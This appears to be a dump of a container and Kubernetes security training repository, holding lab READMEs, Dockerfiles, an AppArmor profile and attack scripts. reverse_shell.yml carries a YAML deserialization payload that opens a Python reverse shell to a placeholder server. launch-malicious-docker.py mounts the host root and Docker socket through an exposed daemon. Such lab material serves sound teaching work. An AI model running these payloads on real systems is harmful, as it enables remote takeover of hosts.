├── .gitignore ├── Container ├── AppArmor │ ├── README.md │ ├── k8s-vul-flask-redis-armor │ └── reverse_shell.yml ├── Clair │ ├── README.md │ ├── clair-scanner │ └── img │ │ ├── Open-Terminal.png │ │ ├── cd-path.png │ │ ├── clair-db.png │ │ ├── run-clair.png │ │ └── run-scan.png ├── Docker-Daemon-Configuration │ ├── Dockerfile │ ├── README.md │ ├── __init__.py │ ├── img │ │ ├── daemon-config-1.png │ │ ├── daemon-config-2.png │ │ ├── daemon-config-3.png │ │ ├── daemon-config-4.png │ │ ├── daemon-config-5.png │ │ └── daemon-config-6.png │ ├── launch-malicious-docker.py │ ├── requirements.txt │ └── startup.sh ├── Docker-Hands-On │ ├── Dockerfile │ ├── Dockerfile-Lab.md │ ├── README.md │ ├── helloworld │ │ ├── app.py │ │ └── requirements.txt │ └── img │ │ ├── Open-Terminal.png │ │ ├── docker-exec.png │ │ ├── docker-images-list.png │ │ ├── docker-ps-a.png │ │ ├── docker-ps.png │ │ ├── docker-pull.png │ │ ├── docker-rm.png │ │ ├── docker-rmi-images.png │ │ ├── docker-run.png │ │ ├── docker-stop.png │ │ ├── exit-docker.png │ │ ├── open-app.png │ │ └── open_terminal.png ├── Docker-Monitoring │ ├── README.md │ └── img │ │ ├── auditd-1.png │ │ ├── auditd-2.png │ │ ├── auditd-3.png │ │ ├── auditd-4.png │ │ └── auditd-5.png ├── Docker-bench │ ├── README.md │ └── img │ │ ├── Open-Terminal.png │ │ ├── cd-path.png │ │ └── cmd.png ├── Limiting-Docker-Capabilities │ ├── README.md │ └── img │ │ └── Open-Terminal.png ├── Network-Namespace │ ├── README.md │ └── img │ │ ├── Open-Terminal.png │ │ ├── netns-1.png │ │ ├── netns-2.png │ │ ├── netns-3.png │ │ ├── netns-4.png │ │ ├── netns-5.png │ │ ├── netns-6.png │ │ └── netns-7.png ├── Non-Root Container │ └── README.md ├── OSQuery │ └── README.md ├── README.md ├── Resource-Management │ └── README.md ├── Trojanized-Docker-Image │ ├── README.md │ └── img │ │ ├── trojan-docker-1.png │ │ ├── trojan-docker-2.png │ │ ├── trojan-docker-3.png │ │ ├── trojan-docker-4.png │ │ ├── trojan-docker-5.png │ │ └── trojan-docker-6.png ├── Trusted-Images │ 
├── README.md │ └── img │ │ ├── Open-Terminal.png │ │ └── docker-hub.png ├── Union-Mount-File-System │ ├── README.md │ └── img │ │ ├── ufs-1.png │ │ ├── ufs-2.png │ │ ├── ufs-3.png │ │ ├── ufs-4.png │ │ ├── ufs-5.png │ │ └── ufs-6.png ├── Vulnerable-Libraries-ShellShock │ ├── README.md │ └── img │ │ ├── Open-Terminal.png │ │ ├── defaced.png │ │ └── shellshock-browser.png ├── container-breakout │ ├── README.md │ └── img │ │ ├── remove_tmux.png │ │ ├── split_pane.png │ │ ├── terminate_process.png │ │ └── tmux-greenband.png ├── distroless │ ├── Dockerfile │ ├── README.md │ ├── __init__.py │ ├── app.py │ ├── distroful │ │ ├── Dockerfile │ │ ├── __init__.py │ │ ├── app.py │ │ └── requirements.txt │ └── requirements.txt ├── dive │ ├── README.md │ └── img │ │ └── Open-Terminal.png ├── extra │ └── container │ │ ├── Anchore │ │ ├── README.md │ │ ├── config.yaml │ │ ├── docker-compose.yaml │ │ └── img │ │ │ └── Open-Terminal.png │ │ ├── Authentication-Attacks-against-Host │ │ ├── README.md │ │ └── img │ │ │ └── Open-Terminal.png │ │ ├── Container-Orchestrators │ │ ├── Docker-Compose │ │ │ ├── README.md │ │ │ ├── conf.d │ │ │ │ └── app.conf │ │ │ ├── docker-compose.yml │ │ │ └── img │ │ │ │ ├── Open-Terminal.png │ │ │ │ └── app-status.png │ │ └── README.md │ │ ├── Dagda │ │ ├── README.md │ │ └── img │ │ │ ├── Open-Terminal.png │ │ │ ├── cd-path.png │ │ │ ├── dagda-db.png │ │ │ ├── env1.png │ │ │ └── env2.png │ │ ├── Denial-of-Service │ │ ├── README.md │ │ └── img │ │ │ └── Open-Terminal.png │ │ ├── Docker-Daemon-Direct-Access │ │ ├── README.md │ │ └── img │ │ │ ├── Open-Terminal.png │ │ │ ├── docker-exec.png │ │ │ ├── docker-ps.png │ │ │ ├── docker-rm.png │ │ │ ├── docker-run.png │ │ │ └── docker-stop.png │ │ ├── Docker-Monitoring │ │ ├── README.md │ │ └── img │ │ │ ├── auditd-1.png │ │ │ ├── auditd-2.png │ │ │ ├── auditd-3.png │ │ │ ├── auditd-4.png │ │ │ └── auditd-5.png │ │ ├── Network-Namespace │ │ ├── README.md │ │ └── img │ │ │ ├── Open-Terminal.png │ │ │ ├── 
netns-1.png │ │ │ ├── netns-2.png │ │ │ ├── netns-3.png │ │ │ ├── netns-4.png │ │ │ ├── netns-5.png │ │ │ ├── netns-6.png │ │ │ └── netns-7.png │ │ ├── Union-Mount-File-System │ │ ├── README.md │ │ └── img │ │ │ ├── ufs-1.png │ │ │ ├── ufs-2.png │ │ │ ├── ufs-3.png │ │ │ ├── ufs-4.png │ │ │ ├── ufs-5.png │ │ │ └── ufs-6.png │ │ ├── Vulnerable-Libraries-ShellShock │ │ ├── README.md │ │ └── img │ │ │ ├── Open-Terminal.png │ │ │ ├── defaced.png │ │ │ └── shellshock-browser.png │ │ └── dlayer │ │ ├── README.md │ │ └── img │ │ ├── Open-Terminal.png │ │ ├── dlayer-1.png │ │ ├── dlayer-2.png │ │ └── docker-images-list.png └── seccomp │ ├── README.md │ └── custom_profile.json ├── Kubernetes ├── Initial-Setup │ ├── README.md │ └── install_script.sh ├── Istio │ └── README.md ├── K8s-Cluster-Attack │ ├── README.md │ ├── __init__.py │ ├── malicious-redis │ │ ├── Dockerfile │ │ ├── docker-entrypoint.sh │ │ ├── post_db.sh │ │ └── redis.conf │ ├── malicious_pods │ │ ├── cminer.json │ │ └── malicious-redis-slave.json │ ├── ngflask-redis-service.yml │ ├── ngflaskredis-deployment.yml │ ├── payloads │ │ ├── reverse_shell.yml │ │ └── test_payment.yml │ ├── redis-service.yml │ ├── reverseproxy.conf │ ├── setup_flask_stack.sh │ ├── setup_insecure_kube.sh │ └── tornado_server.py ├── Kube-Bench │ ├── README.md │ ├── cfg │ │ ├── 1.6 │ │ │ ├── federated.yaml │ │ │ ├── master.yaml │ │ │ └── node.yaml │ │ ├── 1.7 │ │ │ ├── federated.yaml │ │ │ ├── master.yaml │ │ │ └── node.yaml │ │ ├── 1.8 │ │ │ ├── config.yaml │ │ │ ├── federated.yaml │ │ │ ├── master.yaml │ │ │ └── node.yaml │ │ └── config.yaml │ ├── img │ │ ├── kube-bench-1.png │ │ ├── kube-bench-2.png │ │ ├── kube-bench-3.png │ │ └── kube-bench-4.png │ └── kube-bench ├── Kube-Hunter │ ├── README.md │ ├── __init__.py │ ├── img │ │ ├── kube-hunter-1.png │ │ ├── kube-hunter-2.png │ │ ├── kube-hunter-3.png │ │ ├── kube-hunter-4.png │ │ └── kube-hunter-5.png │ ├── kube-hunter.py │ ├── plugins │ │ ├── README.md │ │ └── __init__.py │ ├── 
requirements.txt │ └── src │ │ ├── README.md │ │ ├── __init__.py │ │ ├── core │ │ ├── __init__.py │ │ ├── events │ │ │ ├── __init__.py │ │ │ ├── handler.py │ │ │ └── types │ │ │ │ ├── __init__.py │ │ │ │ └── common.py │ │ └── types.py │ │ └── modules │ │ ├── __init__.py │ │ ├── discovery │ │ ├── __init__.py │ │ ├── apiserver.py │ │ ├── dashboard.py │ │ ├── hosts.py │ │ ├── kubelet.py │ │ ├── ports.py │ │ └── proxy.py │ │ ├── hunting │ │ ├── __init__.py │ │ ├── aks.py │ │ ├── certificates.py │ │ ├── dashboard.py │ │ ├── kubelet.py │ │ └── proxy.py │ │ └── report │ │ ├── __init__.py │ │ ├── collector.py │ │ ├── plain.py │ │ └── yaml.py ├── Kube-Sec │ ├── README.md │ ├── img │ │ ├── kube-sec-1.png │ │ └── kube-sec-2.png │ ├── insecure_vulflask_deployment.yaml │ └── kubesec ├── KubeAudit │ ├── README.md │ └── insecure_vulflask_deployment.yaml ├── PodSecurityPolicy │ ├── README.md │ ├── k8s-vul-flask-redis-armor │ ├── reverseproxy.conf │ └── secure-ngflask-deploy.yml ├── Prometheus-Grafana │ ├── README.md │ ├── clusterRole.yaml │ ├── config-map.yaml │ ├── grafana-prometheus.yaml │ ├── img │ │ ├── prometheus-grafana-1.png │ │ ├── prometheus-grafana-10.png │ │ ├── prometheus-grafana-11.png │ │ ├── prometheus-grafana-12.png │ │ ├── prometheus-grafana-13.png │ │ ├── prometheus-grafana-2.png │ │ ├── prometheus-grafana-3.png │ │ ├── prometheus-grafana-4.png │ │ ├── prometheus-grafana-5.png │ │ ├── prometheus-grafana-6.png │ │ ├── prometheus-grafana-7.png │ │ ├── prometheus-grafana-8.png │ │ └── prometheus-grafana-9.png │ ├── kubernetes-pod-monitoring.json │ ├── prometheus.yaml │ └── wecare-k8.yaml ├── README.md ├── ResourceQuota_Limit │ ├── README.md │ └── nginx-basic-limit.yaml ├── RoleBasedAccessControl │ ├── README.md │ ├── img │ │ ├── rbac-1.png │ │ ├── rbac-2.png │ │ ├── rbac-3.png │ │ ├── rbac-4.png │ │ ├── rbac-5.png │ │ ├── rbac-6.png │ │ ├── rbac-7.png │ │ ├── rbac-8.png │ │ └── rbac-9.png │ ├── role-deployment-manager.yaml │ └── rolebinding-deployment-manager.yaml 
├── SealedSecrets │ ├── README.md │ ├── controller.yaml │ ├── mysecret.json │ └── sealedsecret-crd.yaml ├── SysdigFalco │ ├── README.md │ ├── __init__.py │ ├── falco-event-generator-deployment.yaml │ ├── falco_daemonset.yaml │ ├── img │ │ ├── sysdig-falco-1.png │ │ ├── sysdig-falco-2.png │ │ ├── sysdig-falco-3.png │ │ ├── sysdig-falco-4.png │ │ ├── sysdig-falco-5.png │ │ ├── sysdig-falco-6.png │ │ └── sysdig-falco-7.png │ └── tornado_server.py ├── VM │ ├── Initial-Setup │ │ └── README.md │ ├── K8s-Cluster-Attack │ │ ├── README.md │ │ ├── __init__.py │ │ ├── malicious-redis │ │ │ ├── Dockerfile │ │ │ ├── docker-entrypoint.sh │ │ │ ├── post_db.sh │ │ │ └── redis.conf │ │ ├── malicious_pods │ │ │ ├── cminer.json │ │ │ └── malicious-redis-slave.json │ │ ├── ngflask-redis-service.yml │ │ ├── ngflaskredis-deployment.yml │ │ ├── payloads │ │ │ ├── reverse_shell.yml │ │ │ └── test_payment.yml │ │ ├── redis-service.yml │ │ ├── reverseproxy.conf │ │ ├── setup_flask_stack.sh │ │ ├── setup_insecure_kube.sh │ │ └── tornado_server.py │ ├── Kube-Bench │ │ ├── README.md │ │ ├── cfg │ │ │ ├── 1.6 │ │ │ │ ├── federated.yaml │ │ │ │ ├── master.yaml │ │ │ │ └── node.yaml │ │ │ ├── 1.7 │ │ │ │ ├── federated.yaml │ │ │ │ ├── master.yaml │ │ │ │ └── node.yaml │ │ │ ├── 1.8 │ │ │ │ ├── config.yaml │ │ │ │ ├── federated.yaml │ │ │ │ ├── master.yaml │ │ │ │ └── node.yaml │ │ │ └── config.yaml │ │ ├── img │ │ │ ├── kube-bench-1.png │ │ │ ├── kube-bench-2.png │ │ │ ├── kube-bench-3.png │ │ │ └── kube-bench-4.png │ │ └── kube-bench │ ├── Kube-Hunter │ │ ├── README.md │ │ ├── __init__.py │ │ ├── img │ │ │ ├── kube-hunter-1.png │ │ │ ├── kube-hunter-2.png │ │ │ ├── kube-hunter-3.png │ │ │ ├── kube-hunter-4.png │ │ │ └── kube-hunter-5.png │ │ ├── kube-hunter.py │ │ ├── plugins │ │ │ ├── README.md │ │ │ └── __init__.py │ │ ├── requirements.txt │ │ └── src │ │ │ ├── README.md │ │ │ ├── __init__.py │ │ │ ├── core │ │ │ ├── __init__.py │ │ │ ├── events │ │ │ │ ├── __init__.py │ │ │ │ ├── handler.py │ 
│ │ │ └── types │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── common.py │ │ │ └── types.py │ │ │ └── modules │ │ │ ├── __init__.py │ │ │ ├── discovery │ │ │ ├── __init__.py │ │ │ ├── apiserver.py │ │ │ ├── dashboard.py │ │ │ ├── hosts.py │ │ │ ├── kubelet.py │ │ │ ├── ports.py │ │ │ └── proxy.py │ │ │ ├── hunting │ │ │ ├── __init__.py │ │ │ ├── aks.py │ │ │ ├── certificates.py │ │ │ ├── dashboard.py │ │ │ ├── kubelet.py │ │ │ └── proxy.py │ │ │ └── report │ │ │ ├── __init__.py │ │ │ ├── collector.py │ │ │ ├── plain.py │ │ │ └── yaml.py │ ├── Kube-Sec │ │ ├── README.md │ │ ├── img │ │ │ ├── kube-sec-1.png │ │ │ └── kube-sec-2.png │ │ ├── insecure_vulflask_deployment.yaml │ │ └── kubesec │ ├── PodSecurityPolicy │ │ ├── README.md │ │ ├── k8s-vul-flask-redis-armor │ │ ├── reverseproxy.conf │ │ └── secure-ngflask-deploy.yml │ ├── README.md │ ├── ResourceQuota_Limit │ │ ├── README.md │ │ └── nginx-basic-limit.yaml │ ├── RoleBasedAccessControl │ │ ├── README.md │ │ ├── img │ │ │ ├── rbac-1.png │ │ │ ├── rbac-2.png │ │ │ ├── rbac-3.png │ │ │ ├── rbac-4.png │ │ │ ├── rbac-5.png │ │ │ ├── rbac-6.png │ │ │ ├── rbac-7.png │ │ │ ├── rbac-8.png │ │ │ └── rbac-9.png │ │ ├── role-deployment-manager.yaml │ │ └── rolebinding-deployment-manager.yaml │ ├── SealedSecrets │ │ ├── README.md │ │ └── mysecret.json │ └── SysdigFalco │ │ ├── README.md │ │ ├── __init__.py │ │ ├── falco-event-generator-deployment.yaml │ │ ├── falco_daemonset.yaml │ │ ├── img │ │ ├── sysdig-falco-1.png │ │ ├── sysdig-falco-2.png │ │ ├── sysdig-falco-3.png │ │ ├── sysdig-falco-4.png │ │ ├── sysdig-falco-5.png │ │ ├── sysdig-falco-6.png │ │ └── sysdig-falco-7.png │ │ └── tornado_server.py └── Vault │ ├── README.md │ ├── kubernetes-vault.yaml │ ├── policy-kubernetes-vault.hcl │ ├── policy-sample-app.hcl │ ├── sample-app.yaml │ └── vault.yaml ├── README.md ├── Serverless ├── Algorithm-Confusion │ ├── README.md │ ├── img │ │ ├── Open-Terminal.png │ │ ├── click-local-storage.png │ │ ├── local-storage.png │ │ ├── 
login-page.png │ │ └── open-browser.png │ ├── public_key.pem │ ├── token.txt │ └── token_gen.js ├── Bandit │ ├── README.md │ └── img │ │ ├── bandit-1.png │ │ ├── bandit-2.png │ │ └── bandit-3.png ├── Deploy a Function │ └── README.md ├── Event-Injection-S3 │ ├── README.md │ ├── img │ │ ├── click-upload-xml.png │ │ ├── click-xml-file.png │ │ ├── exploited-info.png │ │ ├── login-page.png │ │ ├── open-browser.png │ │ ├── register-page.png │ │ └── upload-file-view.png │ └── malicious-xml.xml ├── Initial-Setup │ ├── README.md │ └── install_script.sh ├── NodeJsScan │ ├── README.md │ └── img │ │ ├── nodejsscan-1.png │ │ ├── nodejsscan-2.png │ │ ├── nodejsscan-3.png │ │ └── nodejsscan-4.png ├── Non-Unique-Value │ ├── README.md │ └── img │ │ ├── Open-Terminal.png │ │ ├── click-protected.png │ │ ├── copy-token.png │ │ ├── finalised.png │ │ ├── local-storage.png │ │ ├── login-page.png │ │ ├── open-browser.png │ │ ├── paste-token.png │ │ └── register-page.png ├── None-Signed-Token │ ├── README.md │ └── img │ │ ├── Open-Terminal.png │ │ ├── get_token.png │ │ ├── local-storage.png │ │ ├── login-page.png │ │ ├── open-browser.png │ │ └── tamper-jwt.png ├── Npm-Audit │ ├── README.md │ └── img │ │ ├── npm-audit-1.png │ │ └── npm-audit-2.png ├── Permission-Flaw │ ├── README.md │ └── img │ │ ├── Open-Terminal.png │ │ ├── local-storage.png │ │ ├── login-page.png │ │ ├── network.png │ │ ├── open-browser.png │ │ ├── param.png │ │ ├── search-default-view.png │ │ ├── search-icon.png │ │ └── search-values.png ├── README.md ├── SQL Injection - FaaS │ └── README.md ├── Safety │ ├── README.md │ └── img │ │ ├── safety-1.png │ │ ├── safety-2.png │ │ ├── safety-3.png │ │ └── safety-4.png ├── Secrets-Management │ ├── README.md │ ├── ops │ │ ├── config.json.tpl │ │ └── setup_env.tf │ └── training-secrets │ │ ├── .gitignore │ │ ├── app.py │ │ └── requirements.txt ├── Server-Side-Template-Injection │ ├── README.md │ └── img │ │ └── Open-Terminal.png ├── Serverless-Attack │ ├── README.md │ ├── 
malicious-file.txt │ ├── read-etc-pwd.txt │ ├── read-py-files.txt │ └── readme.txt └── insecure-deployment │ ├── .arc │ ├── README.md │ ├── package-lock.json │ ├── package.json │ └── src │ └── http │ └── get-index │ ├── index.js │ ├── package-lock.json │ └── package.json └── img ├── github.png ├── twitter.png └── we45logo.jpg /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | _book/ 3 | .idea/ 4 | Serverless/Secrets-Management/ops/.terraform/ 5 | Serverless/Secrets-Management/ops/terraform.tfstate 6 | Serverless/Secrets-Management/ops/terraform.tfstate.backup 7 | Serverless/Secrets-Management/training-secrets/.chalice/deployed/dev.json 8 | Serverless/Secrets-Management/training-secrets/.chalice/config.json 9 | Serverless/Secrets-Management/ops/config.json 10 | -------------------------------------------------------------------------------- /Container/AppArmor/k8s-vul-flask-redis-armor: -------------------------------------------------------------------------------- 1 | #include <tunables/global> 2 | profile k8s-vul-flask-redis-armor flags=(attach_disconnected,mediate_deleted) { 3 | #include <abstractions/base> 4 | file, # file, network and capability grant everything; only the deny rules below restrict the container 5 | network, 6 | capability, 7 | deny /apps/** w, #deny file write to the /apps directory (the application's working directory) 8 | deny /tmp/** w, #deny file write to /tmp directory 9 | deny /etc/passwd rwklx, #deny all access to /etc/passwd 10 | deny /etc/shadow rwklx, #deny all access to /etc/shadow 11 | 12 | #restrict access to HOME (@{HOME} comes from tunables/global) 13 | 14 | audit deny @{HOME}/.* mrwkl, 15 | audit deny @{HOME}/.*/ rw, 16 | audit deny @{HOME}/.*/** mrwkl, 17 | audit deny @{HOME}/bin/ rw, 18 | audit deny @{HOME}/bin/** mrwkl, 19 | # @{HOME}/ r, 20 | # @{HOME}/** rw, 21 | } 22 | -------------------------------------------------------------------------------- /Container/AppArmor/reverse_shell.yml: -------------------------------------------------------------------------------- 1 | name: PayTM Bill payment 3 2 | reason: !!python/object/apply:os.system ["echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"Server_IP_Here\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' > shell.py && python shell.py &"] 3 | merchant: Hello World Traders 4 | amount: 12 5 | card: 4111111111111111 
-------------------------------------------------------------------------------- /Container/Clair/README.md: -------------------------------------------------------------------------------- 1 | # Clair 2 | 3 | --- 4 | 5 | * SSH into your Virtual Lab or open Terminal, if you're on the VM 6 | 7 | * Run `cd /root/labs/container_training/Container/Clair` to enter the Clair lab folder 8 | 9 | * Run the Clair-related docker containers 10 | 11 | * `docker run -d -p 5432:5432 --name db arminc/clair-db:2019-01-01` — the image tag is the date of the vulnerability-data snapshot, so a stale tag silently under-reports; the transcript below was captured with an older `2017-09-18` snapshot, use the newer one. `-p 5432:5432` also publishes the database's Postgres port on every host interface; the `--link` in the next step already lets the Clair container reach it, so bind it to loopback (`-p 127.0.0.1:5432:5432`) or drop the `-p` altogether. 12 | 13 | ```commandline 14 | root@we45:container_training/Container/Container-Vulnerability-Assessment/Clair# docker run -d -p 5432:5432 --name db arminc/clair-db:2017-09-18 15 | e4cc159b0a71400ef6e57b4b2e5207b44bc4ceda630c27c551026a197b7f7414 16 | ``` 17 | 18 | * `docker run -d -p 6060:6060 --link db:postgres --name clair arminc/clair-local-scan:v2.0.1` 19 | 20 | ```commandline 21 | root@we45:container_training/Container/Container-Vulnerability-Assessment/Clair# docker run -d -p 6060:6060 --link db:postgres --name clair arminc/clair-local-scan:v2.0.1 22 | 4e3e38be1f84ff757836ea1cf34184d160b90a9a63ee236b7134d2a842a74f58 23 | ``` 24 | 25 | * Run the Clair scan 26 | * `./clair-scanner --ip <host-ip> -r clair_report.json abhaybhargav/vul_flask:latest` — `--ip` takes the address at which the Clair container can reach this host (clair-scanner serves the image layers to Clair from a local web server; typically the `docker0` bridge address). Without a value, `-r` would be consumed as the IP and the scan fails. The findings are written to `clair_report.json`. The `clair-scanner` binary is checked into the lab folder; outside the lab, fetch a release from its project page and verify its checksum before running it. 27 | ![](img/run-scan.png) 28 | 29 | * Run `clean-docker` to stop all the containers 30 | 31 | ```commandline 32 | root@we45:~$ clean-docker 33 | ``` 34 | -------------------------------------------------------------------------------- /Container/Clair/clair-scanner: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Clair/clair-scanner -------------------------------------------------------------------------------- /Container/Clair/img/Open-Terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Clair/img/Open-Terminal.png -------------------------------------------------------------------------------- /Container/Clair/img/cd-path.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Clair/img/cd-path.png -------------------------------------------------------------------------------- /Container/Clair/img/clair-db.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Clair/img/clair-db.png -------------------------------------------------------------------------------- /Container/Clair/img/run-clair.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Clair/img/run-clair.png -------------------------------------------------------------------------------- /Container/Clair/img/run-scan.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Clair/img/run-scan.png -------------------------------------------------------------------------------- /Container/Docker-Daemon-Configuration/Dockerfile: -------------------------------------------------------------------------------- 1 
| FROM ubuntu:latest 2 | 3 | ENV DEBIAN_FRONTEND noninteractive 4 | 5 | RUN apt-get update -y && \ 6 | apt-get install -y \ 7 | git \ 8 | xvfb \ 9 | x11vnc \ 10 | wget \ 11 | python \ 12 | python-numpy \ 13 | unzip \ 14 | menu \ 15 | geany \ 16 | openbox \ 17 | net-tools \ 18 | geany \ 19 | menu \ 20 | openjdk-8-jre \ 21 | firefox && wget -qO- https://get.docker.com | sh 22 | 23 | Run cd /root && git clone https://github.com/kanaka/noVNC.git && \ 24 | cd noVNC/utils && git clone https://github.com/kanaka/websockify websockify && \ 25 | cd /root 26 | 27 | ADD startup.sh /startup.sh 28 | 29 | RUN chmod 0755 /startup.sh && \ 30 | apt-get autoclean && \ 31 | apt-get autoremove && \ 32 | rm -rf /var/lib/apt/lists/* 33 | 34 | CMD /startup.sh 35 | -------------------------------------------------------------------------------- /Container/Docker-Daemon-Configuration/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Daemon-Configuration/__init__.py -------------------------------------------------------------------------------- /Container/Docker-Daemon-Configuration/img/daemon-config-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Daemon-Configuration/img/daemon-config-1.png -------------------------------------------------------------------------------- /Container/Docker-Daemon-Configuration/img/daemon-config-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Daemon-Configuration/img/daemon-config-2.png -------------------------------------------------------------------------------- 
/Container/Docker-Daemon-Configuration/img/daemon-config-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Daemon-Configuration/img/daemon-config-3.png -------------------------------------------------------------------------------- /Container/Docker-Daemon-Configuration/img/daemon-config-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Daemon-Configuration/img/daemon-config-4.png -------------------------------------------------------------------------------- /Container/Docker-Daemon-Configuration/img/daemon-config-5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Daemon-Configuration/img/daemon-config-5.png -------------------------------------------------------------------------------- /Container/Docker-Daemon-Configuration/img/daemon-config-6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Daemon-Configuration/img/daemon-config-6.png -------------------------------------------------------------------------------- /Container/Docker-Daemon-Configuration/launch-malicious-docker.py: -------------------------------------------------------------------------------- 1 | import docker 2 | client = docker.DockerClient(base_url='tcp://127.0.0.1:4243') 3 | 4 | malicious_image = 'we45/docker-ui:latest' 5 | client.images.pull(malicious_image) 6 | port_key = {"{0}/tcp".format(6080): ('0.0.0.0', 6080)} 7 | 8 | client.containers.run(image=malicious_image, ports=port_key, 
volumes={'/': {'bind': '/rootFS/', 'mode': 'rw'}, '/var/run/docker.sock': {'bind': '/var/run/docker.sock', 'mode': 'rw'}}, detach=True) 9 | -------------------------------------------------------------------------------- /Container/Docker-Daemon-Configuration/requirements.txt: -------------------------------------------------------------------------------- 1 | argparse==1.2.1 2 | backports.ssl-match-hostname==3.5.0.1 3 | certifi==2018.8.24 4 | chardet==3.0.4 5 | docker==3.5.0 6 | docker-pycreds==0.3.0 7 | idna==2.7 8 | ipaddress==1.0.22 9 | requests==2.19.1 10 | six==1.11.0 11 | urllib3==1.23 12 | websocket-client==0.53.0 13 | wsgiref==0.1.2 -------------------------------------------------------------------------------- /Container/Docker-Daemon-Configuration/startup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | export DISPLAY=:1 3 | Xvfb :1 -screen 0 1600x900x16 & 4 | sleep 5 5 | openbox-session& 6 | x11vnc -display :1 -nopw -listen localhost -xkb -ncache 10 -ncache_cr -forever & 7 | cd /root/noVNC && ln -s vnc_auto.html index.html && ./utils/launch.sh --vnc localhost:5900 8 | -------------------------------------------------------------------------------- /Container/Docker-Hands-On/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | RUN apt-get update && apt-get install wget -y && wget -qO- https://get.docker.com | sh 3 | RUN apt install -y ufw python-pip python-dev 4 | RUN mkdir app 5 | COPY helloworld /app/helloworld 6 | ENV TESTENV="test" 7 | WORKDIR /app/helloworld/ 8 | RUN pip install -r requirements.txt 9 | EXPOSE 5000 10 | ENTRYPOINT ["python"] 11 | CMD ["app.py"] 12 | 13 | 14 | -------------------------------------------------------------------------------- /Container/Docker-Hands-On/README.md: -------------------------------------------------------------------------------- 1 | # Docker Hands-On 2 | 3 | 4 | ##### Step 1: 5 | 6 | * 
Pull the `abhaybhargav/vul_flask` docker image from DockerHub. With no tag, `docker pull` resolves the mutable `latest` tag; outside a lab, pin a tag or an `@sha256:` digest so the image you scan is the image you run. 7 | 8 | ```commandline 9 | docker pull abhaybhargav/vul_flask 10 | ``` 11 | 12 | 13 | ##### Step 2: 14 | 15 | * List all docker images on the machine. 16 | 17 | ```bash 18 | docker images 19 | ``` 20 | 21 | 22 | ##### Step 3: 23 | 24 | * Run the `abhaybhargav/vul_flask` docker image. (Side note: the `helloworld/app.py` shipped next to this lab's Dockerfile starts Flask with `debug=True` on `0.0.0.0`; any image built from it exposes the Werkzeug interactive debugger to whoever reaches port 5000 — keep that to the lab.) 25 | 26 | ```bash 27 | docker run -d --name vul_flask abhaybhargav/vul_flask 28 | ``` 29 | 30 | 31 | ##### Step 4: 32 | 33 | * View all running containers. 34 | 35 | ```bash 36 | docker ps 37 | ``` 38 | 39 | 40 | ##### Step 5: 41 | 42 | * To exec into/access the running container, run the following command 43 | 44 | ```bash 45 | docker exec -it vul_flask bash 46 | 47 | root@0c8c0c6a5122:/apps# 48 | ``` 49 | * Note the `root@…:/apps#` prompt: the lab image runs as root inside the container, which the Non-Root Container and Limiting-Docker-Capabilities labs address. 50 | 51 | ##### Step 6: 52 | 53 | * To exit from the container, run `exit` 54 | 55 | ```bash 56 | exit 57 | ``` 58 | 59 | 60 | ##### Step 7: 61 | 62 | * Stop the running `vul_flask` container. 63 | 64 | ```bash 65 | docker stop vul_flask 66 | ``` 67 | 68 | 69 | ##### Step 8: 70 | 71 | * View all running and stopped containers. 72 | 73 | ```bash 74 | docker ps -a 75 | ``` 76 | 77 | 78 | ##### Step 9: 79 | 80 | * Remove the stopped container. 81 | 82 | ```bash 83 | docker rm vul_flask 84 | ``` 85 | 86 | 87 | ##### Step 10: 88 | 89 | * Remove the `abhaybhargav/vul_flask` docker image from the system. 90 | 91 | **Note:** Skip this step on the training VM — later labs (for example the Clair scan) use this same image. 92 | 93 | ```bash 94 | docker rmi abhaybhargav/vul_flask 95 | ``` 96 | -------------------------------------------------------------------------------- /Container/Docker-Hands-On/helloworld/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask 2 | 3 | app = Flask(__name__) 4 | 5 | 6 | @app.route('/') 7 | def hello_world(): 8 | return 'Hello world from the container!' 
